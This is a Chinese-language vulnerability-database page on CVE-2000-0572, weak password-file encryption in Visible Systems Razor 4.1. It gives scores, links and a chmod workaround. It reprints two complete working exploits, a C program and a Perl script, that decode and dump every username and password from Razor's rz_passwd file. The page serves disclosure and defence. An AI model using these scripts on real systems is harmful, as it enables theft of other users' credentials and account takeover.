CVE-2000-0572
CVSS4.6
发布时间 :2000-07-05 00:00:00
修订时间 :2008-09-10 15:05:03
NMCOES    

[原文]The Razor configuration management tool uses weak encryption for its password file, which allows local users to gain privileges.


[CNNVD]可见系统Razor密码文件漏洞(CNNVD-200007-008)

        Razor配置管理工具对密码文件使用弱加密术,本地用户可以提升特权。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0572
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0572
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-008
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-07-8&msg=613309F30B6DD2118C020000F809376C05CABD49@emss03m09.orl.lmco.com
(VENDOR_ADVISORY)  BUGTRAQ  20000704 Recovering Passwords in Visible Systems' Razor
http://www.securityfocus.com/bid/1424
(UNKNOWN)  BID  1424

- 漏洞信息

可见系统Razor密码文件漏洞
中危 访问验证错误
2000-07-05 00:00:00 2005-10-20 00:00:00
本地  
        Razor配置管理工具对密码文件使用弱加密术,本地用户可以提升特权。

- 公告与补丁

        The vendor reports that current versions of Razor use a more robust encryption method and now have other mechanisms to address this vulnerability.

- 漏洞信息 (20056)

Visible Systems Razor 4.1 Password File Vulnerability (1) (EDBID:20056)
unix local
2000-06-16 Verified
0 pbw
N/A [点击下载]
source: http://www.securityfocus.com/bid/1424/info

The Razor Configuration Management program stores passwords in an insecure manner.

A local attacker can obtain the Razor passwords, and either seize control of the software and relevant databases or use those passwords to access other users' accounts on the network. 

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <ctype.h>

/************************************************************

  dumprazorpasswd - 
    dumprazorpasswd
			- prompts for input hex string to decode
    dumprazorpasswd <razor_passwd_file>
			- prints the users and passwords in <file>
    dumprazorpasswd <passwd>
			- encrypts <passwd> and prints it in hex 

  16-jun-2000	pbw.

************************************************************/

#define ASCII2BIN(c) ( isdigit(c) ? c - '0' : toupper(c) - '7' )

#define ROT8L(c,b) ( (c)=( ( (c<< (b%8) ) + (c>>(8-(b%8))&((1<<(b%8))-1)) )
& 0x00ff) )
#define ROT8R(c,b) ( (c)=( ( (c<< (8-(b%8)) ) + (
c>>(b%8)&((1<<(8-(b%8)))-1)) ) & 0x00ff) )

struct pwent
  {
  char uname[17];
  char psswd[17];
  char gname[17];
  };

dumpfile (int fd)
{
int    status, k;
struct pwent pwent;

while ( (status = read (fd, &pwent, 51)) > 0 )
  {
  if (status != 51)
      {
      printf ("fd = %d\n", fd);
      printf ("partial read! only read %d bytes\n", status);
      exit(0);
      }
  k = 0;
  while (pwent.psswd[k] != '\0')
    {
    ROT8L(pwent.psswd[k], 10);
    k++;
    }
  printf ("user %-17s  %-17s\n", &(pwent.uname[0]), &(pwent.psswd[0]));
  }
}

main (int argc, char *argv[])

{
int  fd,i,k;
char   passwd[18];
char   dpasswd[9];

if (argc < 2)
    {
    printf("razor passwd to decrypt :");
    fgets(passwd, 17, stdin);
    passwd[strlen(passwd)-1] = 0;
    k=0;
    for (i=0 ; i<9 ; dpasswd[i++]=0);
    for (i=(strlen(passwd)-1) ; i>=0 ; i--)
      {
      if (k & 1)
          {
          dpasswd[i/2] |= ((ASCII2BIN(passwd[i]) << 4) & 0xf0);
          }
        else
          {
          dpasswd[i/2] = ASCII2BIN(passwd[i]) & 0x0f;
          }
      k++;
      }
    for (i=0 ; i<strlen(dpasswd) ; i++)
      ROT8L(dpasswd[i], 2);
    printf("%s\n", dpasswd);
    exit(0);
    }
fd = open (argv[1], O_RDONLY);
if (fd < 0)
    {					/* assume arg is a passwd to encrypt
*/
    for ( i=0 ; i<strlen(argv[1]) ; i++)
      printf("%02X", (unsigned char)ROT8R(argv[1][i], 2) );
    printf("\n");
    }
  else
    {					/* dump file */
    dumpfile(fd);
    }
exit(0);
}
		

- 漏洞信息 (20058)

Visible Systems Razor 4.1 Password File Vulnerability (2) (EDBID:20058)
unix local
2000-06-15 Verified
0 Shawn A. Clifford
N/A [点击下载]
source: http://www.securityfocus.com/bid/1424/info
 
The Razor Configuration Management program stores passwords in an insecure manner.
 
A local attacker can obtain the Razor passwords, and either seize control of the software and relevant databases or use those passwords to access other users' accounts on the network. 

#!/usr/local/bin/perl

#
#  Title:	passwd_rz.pl
#  Author:	Shawn A. Clifford
#  Date:	2000-June-15
#  Purpose:	Encrypt/decrypt Visible Systems Corp.' Razor passwords
#  Usage:	passwd_rz.pl [ hex_hash | password_file_name ]
#
#		When run without arguments, this program will prompt for
#		a plaintext password and produce the ciphertext that Razor
#		would create for the same string.
#		Eg.:  ./passwd_rz.pl
#
#			Enter a password, max 8 chars:  WayLame  
#			Hash (in hex):  D5585E13585B59
#
#		When passed a hex-character string, the program will
#		generate the corresponding plaintext password.
#		Eg.:  ./passwd_rz.pl D5585E13585B59
#
#			Decrypting input hex string:  D5585E13585B59
#			Plaintext password:           WayLame 
#
#		When passed a filename for a Razor password file (rz_passwd),
#		the program will dump all of the entries in the password
#		file.  Each entry contains a username, password, and group.
#		Eg.:  ./passwd_rz.pl rz_passwd
#
#			Decrypting Razor password file:  rz_passwd
#
#			Username           Password         Group
#			--------           --------         -----
#			luser123           lamerz           please
#			luser45            cant             fix
#			buckwheat          code             this
#			.
#			.
#			.
#			tester1            CCCCCCCC         test
#			tester2            AAAAAA           test
#
#			233 password entries
#


use strict;

#
#  Defines
#
my $arg;			# Command line argument
my $PLEN = 8;		# Maximum number of chars in a password
my $PGLEN = 22;		# Output page length
my @hash;			# Password hash (err, lame cipher)
my $passwd;			# Plaintext password
my $byte;			# A single byte/char
my $buffer;			# Record from the password file
my $i;			# Counter/index
my $user;			# Username from password file
my $group;			# Group name from password file
my $rec_fmt = 'A17 C17 A17';	# rz_passwd record format
my $rec_size = length(pack($rec_fmt, ()));  # Size of a password file record


if ($#ARGV < 0) {	# We want to encrypt a password

   #
   #  Get a password
   #
   print "\nEnter a password, max 8 chars:  ";
   $passwd = <STDIN>;
   chomp $passwd;


   #
   #  Encrypt the password
   #
   print "Hash (in hex):  ";
   for ($i=0; $i < length($passwd) && $i < $PLEN; $i++) {
  
      #
      #  For each byte in the password, rotate right 2 bits
      #
      $byte = unpack("C", substr($passwd,$i,1)) >> 2;
      $byte += unpack("C", substr($passwd,$i,1)) << 6;

      #
      #  Mask off the resultant low byte and save
      #
      $hash[$i] = $byte & 0x00ff;
      printf "%X", $hash[$i];
   }
   print "\n\n";

} else {		# We want to decrypt a rz_passwd file or hex string

   $arg = shift;

   if ( -f ${arg} ) {	# It's a file to process

      print "\nDecrypting Razor password file:  $arg\n";
      open(IN, "<${arg}") || die "Can't open passwd file: $!";

      $i = 0;
      while ( read(IN, $buffer, $rec_size) == $rec_size ) {
         if ($i % $PGLEN == 0) {
            print "\nUsername           Password         Group\n";
            print "--------           --------         -----\n";
         }
         ($user, @hash, $group) = unpack($rec_fmt, $buffer);
         $group = substr($buffer, 34, 17);  # unpack didn't give me this,
why?
         printf "%-17s  %-15s  %-17s\n", $user, decrypt(@hash), $group;
         $i++;
      }
      printf "\n%d password entries\n\n", $i;
      close(IN);

   } else {		# It had better be a string of hex digits!

      print "\nDecrypting input hex string:  $arg\n";

      #
      #  Convert ASCII character string to a binary array
      #
      @hash = ();
      for ($i=0; $i < (length($arg)/2) && $i < $PLEN; $i++) {
         $byte = hex(substr($arg, $i*2, 2));
         $hash[$i] = $byte;
      }

      #
      #  Call the decrypt function to print the plaintext password
      #
      printf "Plaintext password:           %s\n\n", decrypt(@hash);

   }

}

sub decrypt {
   my @hash = @_;		# Pick up the passed array
   my $passwd = ();		# Zero the output plaintext scalar
   my $i;
   my $byte;


   #
   #  Decrypt the lamely enciphered password
   #
   for ($i=0; $i < $PLEN; $i++) {

      #
      #  Convert NULLs to spaces
      #
      if ($hash[$i] == 0) {
         $passwd = $passwd . " ";
         next;
      }

      #
      #  For each byte in the hash, rotate left 2 bits
      #
      $byte = $hash[$i] << 2;
      $byte += ($hash[$i] >> 6) & 0x03;

      #
      #  Mask off the resultant low byte and save
      #
      $passwd = $passwd . chr($byte & 0x00ff);

   }

   return $passwd;
}
		

- 漏洞信息

13691
Razor Configuration Management Password File Weak Encryption
Local Access Required Cryptographic
Loss of Confidentiality Workaround
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-07-04 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: Change the permissions on the rz_passwd file, by typing the following command: chmod 700 rz_passwd

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Visible Systems Razor Password File Vulnerability
Access Validation Error 1424
No Yes
2000-07-05 12:00:00 2007-02-23 06:06:00
Posted to Bugtraq on July 5 2000 by Shawn Clifford <shawn.a.clifford@lmco.com>

- 受影响的程序版本

Visible Systems Razor 4.1

- 漏洞讨论

The Razor Configuration Management program stores passwords in an insecure manner.

A local attacker can obtain the Razor passwords, and either seize control of the software and relevant databases or use those passwords to access other users' accounts on the network.

- 漏洞利用

The following exploits are available:

- 解决方案

The vendor reports that current versions of Razor use a more robust encryption method and now have other mechanisms to address this vulnerability.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站